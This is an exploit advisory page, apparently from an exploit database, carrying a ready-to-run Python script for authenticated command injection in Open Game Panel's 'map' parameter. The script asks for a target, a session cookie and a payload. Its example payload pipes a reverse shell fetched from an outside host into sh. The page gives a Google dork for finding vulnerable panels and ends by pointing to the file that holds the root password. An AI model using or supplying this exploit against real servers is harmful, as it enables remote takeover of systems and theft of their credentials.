Open Game Panel Remote Code Execution

2021.10.05
Credit: prey
Risk: High
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: Open Game Panel - Remote Code Execution (RCE) (Authenticated) # Google Dork: intext:"Open Game Panel 2021" # Date: 08/14/2021 # Exploit Author: prey # Vendor Homepage: https://www.opengamepanel.org/ # Software Link: https://github.com/OpenGamePanel/OGP-Website # Version: before 14 Aug patch (https://github.com/OpenGamePanel/OGP-Website/pull/561/commits) # Tested on: CentOS Linux 5.4.102 #Before the patch, it was possible to inject system commands on "map" parameter when launching a new counter-strike server just by putting the command= betwen ';', the user needs to be authenticated for this. import requests banner = """ @ @ @@& @@@@@/ @ @& #@@@@@& .= ,/%@# @ @@@@@@@@@@@@@((%@@@@* @ #@@@@@@@@@@@@@@@*%@, @ @@@@@@@@@@@@@@&@@@@ @ &@@@@@@@@@/ &@@@. @ @@@@@@@@@( @ @@@@@@@@@@@@@&* @ &@@@@@@@@@@@@@@@@% @ ,&@@@@@@@@@@@@@ @ %@@@@@@@. @ .%@@@@@@@@% @@@@@@ @ @@@@@# .&@@@@# @ (@@@@@@@@@@@. .@@@& @@% @ .@@@@@, #@@@@@* #@@@ @@@@@ @ @@@& &@@@. @@@ @ ,@@@ @@@@@@ @ @@@ %@@@, @&@@ @@@, @@@@ @@@@ *@@@@@# @@ *@@ %@ @@@ @@ @@@@@/ @@@ @@@ ,@@@ ,@( .@= % *@/ @@ .@/ @(@ @@ @@@( @@ ,@( @@@* @#@@ @@(@ ,@( .@= % *@@@@@@ @@ @ &&.@( @@ @.@@ @@@@ @@.@(@ @@ (@. @@ ,@( .@= % *@/ %@(@ @@@ @@ *@@@ @@ @@ @@. @@ @@@@@@, ,@( .@= % *@/ @@* @@@ @@ %@@ @@@@@* @@ @@ &@ @@ ,@@@@@ .@= @@@@ ##You can get mod_id and home_id on your game panel URL when you are logged """ print(banner) target = input("Target url: (eg: https://panel.example.org)\n") opengamepanel_web = input("opengamepanel_web Cookie: (eg: kulonmu5ldu71nmggv2p571nu1)\n") mod_id = input("Mod_id value: (eg: 2437)\n") home_id = input("Home_id value: (eg: 3737)\n") server_ip_port = input("Server IP:port: (eg: 192.168.69.69:42069)\n") command = input("Payload: (eg: curl https://reverse-shell.sh/1.1.1.1:1337|sh)\n") url = target + "/home.php?m=gamemanager&p=game_monitor" cookies = {"opengamepanel_web": opengamepanel_web} headers = {"Content-Type": "application/x-www-form-urlencoded"} data = {"mod_id": mod_id, "home_id": home_id, "ip_port": server_ip_port, "map": ";" + command + ";", "start_server": "whatever"} try: requests.post(url, headers=headers, cookies=cookies, data=data) except: print("Something went wrong, check your inputs or try manually exploiting the map parameter") print("Finished. you can now literally read the file $HOME/OGP/Cfg/Config.pm for the root password yaay! (CVE-2021-37157)")


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top